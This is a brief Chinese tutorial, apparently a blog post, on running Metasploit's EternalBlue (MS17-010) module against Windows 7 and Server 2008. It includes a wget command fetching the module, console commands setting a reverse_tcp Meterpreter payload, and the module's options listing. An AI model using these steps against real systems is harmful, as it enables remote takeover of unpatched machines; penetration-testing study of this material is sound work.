本文介绍如何使用Metasploit框架中的ms17_010_eternalblue模块来针对Windows 7及Server 2008系统进行永恒之蓝漏洞的利用。具体步骤包括下载并配置相关模块,设置payload为windows/x64/meterpreter/reverse_tcp,并展示如何设置模块选项来实现攻击。
参考:
https://www.rapid7.com/db/modules/exploit/windows/smb/ms17_010_eternalblue
wget "https://raw.githubusercontent.com/rapid7/metasploit-framework/6d81ca42087efd6548bfcf924172376d5234a25a/modules/exploits/windows/smb/ms17_010_eternalblue.rb" -O /usr/share/metasploit-framework/modules/exploits/windows/smb/ms17_010_eternalblue.rb
msf exploit(handler) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf exploit(handler) > use exploit/windows/smb/ms17_010_eternalblue
msf exploit(ms17_010_eternalblue) > show options
Module options (exploit/windows/smb/ms17_010_eternalblue):
Name Current Setting Required Description
---- --------------- -------- -----------
GroomAllocations 12 yes Initial number of times to groom the kernel pool.
GroomDelta 5 yes The amount to increase the groom count by per try.
MaxExploitAttempts 3 yes The number of times to retry the exploit.
ProcessName spoolsv.exe yes Process to inject payload into.
RHOST yes The target address
RPORT 445 yes The target port (TCP)
Exploit target:
Id Name
-- ----
0 Windows 7 and Server 2008 (x64) All Service Packs
额外可参考metasploit的检测模块:
https://www.rapid7.com/db/modules/auxiliary/scanner/smb/smb_ms17_010
扫一扫
1534
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
